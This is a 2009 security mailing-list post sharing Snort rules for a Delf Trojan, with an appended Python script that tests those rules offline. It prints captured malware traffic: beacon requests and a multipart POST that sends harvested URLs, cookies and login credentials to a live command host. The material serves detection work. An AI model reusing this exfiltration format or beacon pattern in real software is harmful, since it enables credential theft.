[Emerging-Sigs] Trojan: Delf Web Activity

ANDREW J WOOD AJWOOD at sentara.com
Fri Jan 30 16:42:03 EST 2009


We've discovered a Trojan that scans cookies, HTTP posts, and URLs. When it finds something of interest, it posts it to a website, in my case one located in Japan. I have created 2 basic rules that capture the traffic. I would have been more specific, but as I only have one example, I did not want to miss a small variation. I've included a complete POST that gets sent, as grabbed by tcpdump. (Don't get me started with the Viewstate.)

AVG calls the Trojans this host has "delf.hgn" and "delf.hgm". So far, I've seen no AV or malware detection app that sees the infected files while they are loaded in memory. On our system, they dropped 2 files: svchost.exe and csrss.exe (they did not overwrite the system files with the same names).

alert tcp $HOME_NET any -> !$HOME_NET 80 (msg:"TROJAN ACTIVITY:  DELF Web Posts"; flow: to_server,established; uricontent: "/uploads/update"; nocase; uricontent: "uploadposts"; nocase; classtype:trojan-activity; sid:9000001; rev:1;)

alert tcp $HOME_NET any -> !$HOME_NET 80 (msg:"TROJAN ACTIVITY:  DELF Web Activity"; flow: to_server,established; uricontent: "/uploads/update"; nocase; uricontent: "read_cmd"; nocase; classtype:trojan-activity; sid:9000002; rev:1;)

Note: The 3 GET requests below are independent of whether there is data to post.

Thanks,
Andy

Header of seen GET/POST requests:

GET /uploads/update/b.php?p=p HTTP/1.1
Host: shindan-f.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

________________________________________________

GET /uploads/update/b.php/../p.php HTTP/1.1
Host: shindan-f.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

_________________________________________________

GET /uploads/update/b.php?id=2697&cmd=read_cmd&idle=0 HTTP/1.1 
Host: shindan-f.com 
Accept: text/html, */* 
Accept-Encoding: identity 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

__________________________________________________

POST /uploads/update/b.php?cmd=uploadposts&v=3.0.0-1&id=2697 HTTP/1.0 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=--------013009142437078 
Content-Length: 935 
Host: shindan-f.com 
Accept: text/html, */* 
Accept-Encoding: identity 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

----------013009145438524 
Content-Disposition: form-data; name="cmd"  

uploadposts 
----------013009145438524 
Content-Disposition: form-data; name="data_url"   

----------013009145438524
Content-Disposition: form-data; name="data_cookies"

----------013009145438524
Content-Disposition: form-data; name="data_posts"

https://data.portal.com/unsecured/login.aspx?TYPE=33554432&REALMOID=06-645d1a09-7d5b-4bcc-ae23-d3ef2bb370a5&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=data2&TARGET=-SM-https%3a%2f%2fdata2.portal.com%2f 

BIGipServerSI_data.portal.com_pool=2869159587.0.0000

__VIEWSTATE=%2FwEPDwULLTE1ODYzMzc1NTNkZJW8ETSAKqS6547tGB%2BEzHmDnJIQ&ctlLogin%24LoginID=UZER123&ctlLogin%24Password=YerBusted&ctlLogin%24ctl00=Login&__EVENTVALIDATION=%2FwEWBAKzvYfqCAK%2Bg5SfDAKEhPnFBAKPs6rKCSx7jOoVbzXESearFJ%2FUakKddnuW.

===================================

[part=0 total=546] ----------013009145438524--
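The two rules in the post, reduced to a small offline matcher so their behaviour can be checked against the request lines from the capture. This is an added example, not Andy's rules or any Snort code: each rule is cut down to its uricontent strings (all must occur in the URI, case-insensitively, as nocase requires), the flow and port conditions are ignored, and matching is done on the raw request URI rather than Snort's normalised URI buffer, which is a simplification. The block also parses a multipart body in the shape of the captured POST to list which form fields the Trojan fills in. The four request lines are taken from the post; the benign and upper-case request lines, the multipart boundary and all field values are constructed placeholders.

```python
"""Offline check of the two DELF rules from the post against captured request lines.

Added example: reduces each Snort rule to its uricontent conditions and applies
them to the raw request URI (Snort matches on its normalised URI buffer, so this
is a simplification, not a re-implementation of http_inspect).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    """The part of a rule this example honours: every uricontent must occur in the URI."""
    sid: int
    msg: str
    uricontents: Tuple[str, ...]


# The two rules from the post, reduced to sid, msg and their uricontent strings.
RULES: Tuple[Rule, ...] = (
    Rule(9000001, "TROJAN ACTIVITY: DELF Web Posts", ("/uploads/update", "uploadposts")),
    Rule(9000002, "TROJAN ACTIVITY: DELF Web Activity", ("/uploads/update", "read_cmd")),
)

_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<uri>\S+)\s+HTTP/1\.[01]\s*$")


def parse_request_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (method, uri) for an HTTP/1.x request line, or None if the line is not one."""
    m = _REQUEST_LINE.match(line.strip())
    return (m.group("method"), m.group("uri")) if m else None


def match_rules(uri: str, rules: Tuple[Rule, ...] = RULES) -> List[int]:
    """SIDs of every rule whose uricontent strings all occur in the URI (nocase)."""
    folded = uri.lower()
    return [r.sid for r in rules if all(c.lower() in folded for c in r.uricontents)]


def scan(requests: List[str], rules: Tuple[Rule, ...] = RULES) -> Dict[str, List[int]]:
    """Map each request line to the SIDs it triggers; lines that are not request lines are skipped."""
    hits: Dict[str, List[int]] = {}
    for line in requests:
        parsed = parse_request_line(line)
        if parsed is not None:
            hits[line] = match_rules(parsed[1], rules)
    return hits


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Return {field name: value} for the text parts of a multipart/form-data body."""
    fields: Dict[str, str] = {}
    for chunk in body.replace("\r\n", "\n").split("--" + boundary):
        chunk = chunk.strip("\n")
        if not chunk or chunk.startswith("--"):  # preamble, or the "--" closing the last delimiter
            continue
        headers, _, value = chunk.partition("\n\n")
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value.strip("\n")
    return fields


# The four request lines from the capture in the post, plus two constructed lines.
SAMPLE_REQUESTS = [
    "GET /uploads/update/b.php?p=p HTTP/1.1",
    "GET /uploads/update/b.php/../p.php HTTP/1.1",
    "GET /uploads/update/b.php?id=2697&cmd=read_cmd&idle=0 HTTP/1.1",
    "POST /uploads/update/b.php?cmd=uploadposts&v=3.0.0-1&id=2697 HTTP/1.0",
    "GET /index.html HTTP/1.1",                         # constructed benign request
    "GET /UPLOADS/UPDATE/B.PHP?CMD=READ_CMD HTTP/1.1",  # constructed: exercises nocase
]

# Constructed body in the shape of the captured POST; boundary and values are placeholders.
BOUNDARY = "CONSTRUCTEDBOUNDARY"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nuploadposts\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"data_url\"\r\n\r\nhttps://login.example.test/login.aspx\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"data_cookies\"\r\n\r\nsession=PLACEHOLDER\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"data_posts\"\r\n\r\nLoginID=UZER123&Password=PLACEHOLDER\r\n"
    f"--{BOUNDARY}--\r\n"
)

if __name__ == "__main__":
    for line, sids in scan(SAMPLE_REQUESTS).items():
        print(sids or "-", line)
    print("fields carried by the POST:", list(parse_multipart(SAMPLE_BODY, BOUNDARY)))
```

Running the block shows the point the post's note makes: only the `read_cmd` beacon (sid 9000002) and the `uploadposts` upload (sid 9000001) fire; the first two GET requests, `b.php?p=p` and the `/../p.php` one, match neither rule even though they hit the same `/uploads/update` path, so the rules alone do not record every contact with the host. The multipart parse lists `cmd`, `data_url`, `data_cookies` and `data_posts`, the fields that carry the harvested URL, cookies and form posts in the capture.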
